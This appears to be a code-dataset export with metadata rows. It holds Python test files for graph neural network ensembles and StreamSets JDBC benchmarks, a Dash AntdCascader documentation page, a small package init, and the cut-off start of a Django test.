optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_labels_test,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(edge_ids_test, edge_labels_test),
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(edge_ids_test, edge_labels_test)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_labels_test,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(edge_ids_test, edge_labels_test),
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(edge_ids_test, edge_labels_test)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
def test_predict_generator_link_prediction():
tf.keras.backend.clear_session()
edge_ids_test = np.array([[1, 2], [2, 3], [1, 3]])
graph = example_graph_1(feature_size=2)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(edge_ids_test)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=edge_ids_test)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
assert len(test_predictions) == len(edge_ids_test)
assert test_predictions.shape[1] == 1
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
assert test_predictions.shape[2] == len(edge_ids_test)
assert test_predictions.shape[3] == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(edge_ids_test)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=edge_ids_test)
# We won't train the model instead use the initial random weights to test
# the evaluate_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
assert len(test_predictions) == len(edge_ids_test)
assert test_predictions.shape[1] == 1
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
assert test_predictions.shape[2] == len(edge_ids_test)
assert test_predictions.shape[3] == 1
| 34.309091
| 112
| 0.636531
| 3,447
| 28,305
| 4.994778
| 0.089643
| 0.030203
| 0.039031
| 0.063426
| 0.853923
| 0.83766
| 0.828948
| 0.811523
| 0.797526
| 0.794041
| 0
| 0.017863
| 0.274157
| 28,305
| 824
| 113
| 34.350728
| 0.820151
| 0.166543
| 0
| 0.701818
| 0
| 0
| 0.010987
| 0
| 0
| 0
| 0
| 0.001214
| 0.087273
| 1
| 0.023636
| false
| 0
| 0.02
| 0
| 0.054545
| 0.007273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe3d794c54a1bf5bf74cd1b3b6795a3c45ba7bf7
| 38,911
|
py
|
Python
|
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | 10
|
2021-05-20T06:52:42.000Z
|
2022-03-29T08:36:58.000Z
|
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | null | null | null |
views/AntdCascader.py
|
RuixiangS/feffery-antd-docs
|
c48d34ed657ec8d6893440c0ee6382598c564922
|
[
"MIT"
] | 2
|
2021-09-14T07:07:00.000Z
|
2021-12-10T01:03:25.000Z
|
from dash import html
import feffery_antd_components as fac
import feffery_utils_components as fuc
import callbacks.AntdCascader
docs_content = html.Div(
[
html.Div(
[
html.H2(
'AntdCascader(id, className, style, *args, **kwargs)',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5'
}
),
fac.AntdBackTop(
containerId='docs-content',
duration=0.6
),
html.Span(
'主要参数说明:',
id='主要参数说明',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5',
'fontWeight': 'bold',
'fontSize': '1.2rem'
}
),
fuc.FefferyMarkdown(
markdownStr=open('documents/AntdCascader.md', encoding='utf-8').read()
),
html.Div(
html.Span(
'使用示例',
id='使用示例',
style={
'borderLeft': '4px solid grey',
'padding': '3px 0 3px 10px',
'backgroundColor': '#f5f5f5',
'fontWeight': 'bold',
'fontSize': '1.2rem'
}
),
style={
'marginBottom': '10px'
}
),
html.Div(
[
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdDivider(
'基础使用',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdParagraph(
[
fac.AntdText(' 默认参数下,'),
fac.AntdText('AntdCascader', strong=True),
fac.AntdText('以单选的模式,供用户进行末端叶节点的选择')
]
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='基础使用',
className='div-highlight'
),
html.Div(
[
fac.AntdSpace(
[
fac.AntdCascader(
placeholder='placement="bottomRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='bottomRight',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topLeft"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topLeft',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topRight',
style={
'width': '300px'
}
)
]
),
fac.AntdDivider(
'不同的悬浮层展开方位',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdSpace(
[
fac.AntdCascader(
placeholder='placement="bottomRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='bottomRight',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topLeft"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topLeft',
style={
'width': '300px'
}
),
fac.AntdCascader(
placeholder='placement="topRight"',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
placement='topRight',
style={
'width': '300px'
}
)
]
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='不同的悬浮层展开方位',
className='div-highlight'
),
html.Div(
[
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
expandTrigger='hover',
style={
'width': '300px'
}
),
fac.AntdDivider(
'鼠标悬浮触发展开子菜单',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
placeholder='请在下列层级结构中进行选择',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
}
],
expandTrigger='hover',
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='鼠标悬浮触发展开子菜单',
className='div-highlight'
),
html.Div(
[
fac.AntdCascader(
placeholder='多选模式:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
),
fac.AntdDivider(
'多选模式',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdCascader(
placeholder='多选模式:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='多选模式',
className='div-highlight'
),
html.Div(
[
fac.AntdSpin(
fac.AntdSpace(
[
html.Div(
[
fac.AntdText('单选value:', strong=True),
fac.AntdText(id='cascader-demo-output')
]
),
html.Div(
[
fac.AntdText('多选value:', strong=True),
fac.AntdText(id='cascader-multiple-demo-output')
]
),
fac.AntdCascader(
id='cascader-demo',
placeholder='单选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdCascader(
id='cascader-multiple-demo',
placeholder='多选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)
],
direction='vertical'
),
text='回调中'
),
fac.AntdDivider(
'回调示例',
lineColor='#f0f0f0',
innerTextOrientation='left'
),
fac.AntdParagraph(
[
fac.AntdText(' AntdCascader', strong=True),
fac.AntdText('已选择的值会在value中以层级选择路径对应值列表的形式进行记录,当满足后代节点被全选时则会仅记录对应的祖先节点值')
]
),
fac.AntdCollapse(
fuc.FefferySyntaxHighlighter(
showLineNumbers=True,
showInlineLineNumbers=True,
language='python',
codeStyle='coy-without-shadows',
codeString='''
fac.AntdSpin(
fac.AntdSpace(
[
html.Div(
[
fac.AntdText('单选value:', strong=True),
fac.AntdText(id='cascader-demo-output')
]
),
html.Div(
[
fac.AntdText('多选value:', strong=True),
fac.AntdText(id='cascader-multiple-demo-output')
]
),
fac.AntdCascader(
id='cascader-demo',
placeholder='单选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
style={
'width': '300px'
}
),
fac.AntdCascader(
id='cascader-multiple-demo',
placeholder='多选回调示例:',
options=[
{
'value': '节点1',
'label': '节点1',
'children': [
{
'value': '节点1-1',
'label': '节点1-1'
},
{
'value': '节点1-2',
'label': '节点1-2',
'children': [
{
'value': '节点1-2-1',
'label': '节点1-2-1'
},
{
'value': '节点1-2-2',
'label': '节点1-2-2'
}
]
}
]
},
{
'value': '节点2',
'label': '节点2',
'children': [
{
'value': '节点2-1',
'label': '节点2-1'
},
{
'value': '节点2-2',
'label': '节点2-2'
}
]
}
],
multiple=True,
style={
'width': '300px'
}
)
],
direction='vertical'
),
text='回调中'
)
...
@app.callback(
Output('cascader-demo-output', 'children'),
Input('cascader-demo', 'value')
)
def cascader_demo_callback(value):
return str(value)
@app.callback(
Output('cascader-multiple-demo-output', 'children'),
Input('cascader-multiple-demo', 'value')
)
def cascader_multiple_demo_callback(value):
return str(value)'''
),
title='点击查看代码',
is_open=False,
ghost=True
)
],
style={
'marginBottom': '40px',
'padding': '10px 10px 20px 10px',
'border': '1px solid #f0f0f0'
},
id='回调示例',
className='div-highlight'
),
html.Div(style={'height': '100px'})
],
style={
'flex': 'auto'
}
),
html.Div(
fac.AntdAnchor(
linkDict=[
{'title': '主要参数说明', 'href': '#主要参数说明'},
{
'title': '使用示例',
'href': '#使用示例',
'children': [
{'title': '基础使用', 'href': '#基础使用'},
{'title': '不同的悬浮层展开方位', 'href': '#不同的悬浮层展开方位'},
{'title': '鼠标悬浮触发展开子菜单', 'href': '#鼠标悬浮触发展开子菜单'},
{'title': '多选模式', 'href': '#多选模式'},
{'title': '回调示例', 'href': '#回调示例'}
]
},
],
containerId='docs-content',
targetOffset=200
),
style={
'flex': 'none',
'margin': '20px'
}
)
],
style={
'display': 'flex'
}
)
| 40.07312
| 105
| 0.175169
| 1,398
| 38,911
| 4.864807
| 0.102289
| 0.056462
| 0.06352
| 0.047052
| 0.863402
| 0.842376
| 0.825026
| 0.813704
| 0.78709
| 0.78709
| 0
| 0.060354
| 0.740253
| 38,911
| 970
| 106
| 40.114433
| 0.612546
| 0
| 0
| 0.602345
| 0
| 0
| 0.353216
| 0.019429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004264
| 0
| 0.006397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe403b2e97efd4d6793d7d309731facd2749417a
| 8,222
|
py
|
Python
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests-external
|
6f255b5e7496deeef333b57a5e9df4911ba3ef00
|
[
"Apache-2.0"
] | 14
|
2019-03-04T10:12:39.000Z
|
2021-11-24T16:17:09.000Z
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests-external
|
6f255b5e7496deeef333b57a5e9df4911ba3ef00
|
[
"Apache-2.0"
] | 48
|
2019-03-08T14:59:06.000Z
|
2021-08-13T14:49:56.000Z
|
performance/test_jdbc_multitable_consumer.py
|
streamsets/datacollector-tests
|
6c3e908768e1d4a586e9183e2141096921ecd5be
|
[
"Apache-2.0"
] | 23
|
2018-09-24T20:49:17.000Z
|
2021-11-24T16:17:11.000Z
|
# Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The tests in this module are for running high-volume pipelines, for the purpose of performance testing.
"""
import logging
import random
import string
import uuid
from time import sleep
import pytest
import sqlalchemy
from streamsets.testframework.markers import database, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def sdc_builder_hook():
def hook(data_collector):
data_collector.SDC_JAVA_OPTS = '-Xmx8192m -Xms8192m'
return hook
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_default(sdc_builder, database, benchmark, number_of_rows):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'{src_table_prefix}%'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('2.7.0.0')
@pytest.mark.parametrize('number_of_threads', (2, 4, 8, 16))
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_multithreaded(sdc_builder, database, benchmark,
number_of_rows, number_of_threads):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
partition_size = str(int(number_of_rows / number_of_threads))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'{src_table_prefix}%',
'partitionSize': partition_size}],
number_of_threads=number_of_threads,
maximum_pool_size=number_of_threads)
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('2.7.0.0')
@pytest.mark.parametrize('number_of_rows', (500_000, 1_000_000, 5_000_000))
@database
def test_jdbc_multitable_consumer_origin_partitioning_disabled(sdc_builder, database, benchmark, number_of_rows):
"""Performance benchmark a simple JDBC mutli-table consumer to trash pipeline."""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'{src_table_prefix}%',
'partitioningMode': 'DISABLED'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(40)))
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding %s rows into %s database ...', number_of_rows, database.type)
connection = database.engine.connect()
connection.execute(table.insert(),
[{'id': i, 'name': str(uuid.uuid4())} for i in range(1, number_of_rows+1)])
def benchmark_pipeline(executor, pipeline):
pipeline.id = str(uuid.uuid4())
executor.add_pipeline(pipeline)
executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(number_of_rows, timeout_sec=3600)
executor.stop_pipeline(pipeline).wait_for_stopped()
executor.remove_pipeline(pipeline)
benchmark.pedantic(benchmark_pipeline, args=(sdc_builder, pipeline), rounds=2)
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
| 45.175824
| 118
| 0.685356
| 982
| 8,222
| 5.477597
| 0.203666
| 0.03272
| 0.035694
| 0.018963
| 0.804239
| 0.804239
| 0.796431
| 0.78918
| 0.78918
| 0.78918
| 0
| 0.020225
| 0.212235
| 8,222
| 181
| 119
| 45.425414
| 0.810252
| 0.107638
| 0
| 0.788618
| 0
| 0
| 0.093673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065041
| false
| 0
| 0.073171
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe8530d264144ce505dd57ab76c2653b64afeea0
| 105
|
py
|
Python
|
fppy/model/__init__.py
|
uit-cosmo/filtered-point-process
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | 1
|
2022-02-09T08:57:08.000Z
|
2022-02-09T08:57:08.000Z
|
fppy/model/__init__.py
|
uit-cosmo/filtered-point-process
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | 1
|
2022-01-26T11:43:55.000Z
|
2022-01-26T11:43:55.000Z
|
fppy/model/__init__.py
|
uit-cosmo/fppy
|
2d681b9a6a09dcfa3095f5917bf062697540fb49
|
[
"MIT"
] | null | null | null |
from fppy.model.forcing import *
from fppy.model.fpp_model import *
from fppy.model.pulse_shape import *
| 26.25
| 36
| 0.8
| 17
| 105
| 4.823529
| 0.470588
| 0.292683
| 0.47561
| 0.463415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 105
| 3
| 37
| 35
| 0.88172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fea6e2d8cb83d8a1eda2cfe916c82ba6744c6a20
| 952
|
py
|
Python
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandria-docs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 2
|
2017-03-26T22:38:49.000Z
|
2017-04-22T11:28:07.000Z
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandriadocs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 22
|
2017-06-10T17:15:59.000Z
|
2018-08-06T14:57:44.000Z
|
alexandriadocs/search/tests/test_views.py
|
srtab/alexandria-docs
|
94b221a4140db23ad6d97a98c7cf521fbdefbc0a
|
[
"Apache-2.0"
] | 1
|
2017-03-24T23:10:16.000Z
|
2017-03-24T23:10:16.000Z
|
# -*- coding: utf-8 -*-
from django.test import TestCase
from django.urls import reverse
class SearchProjectViewTest(TestCase):
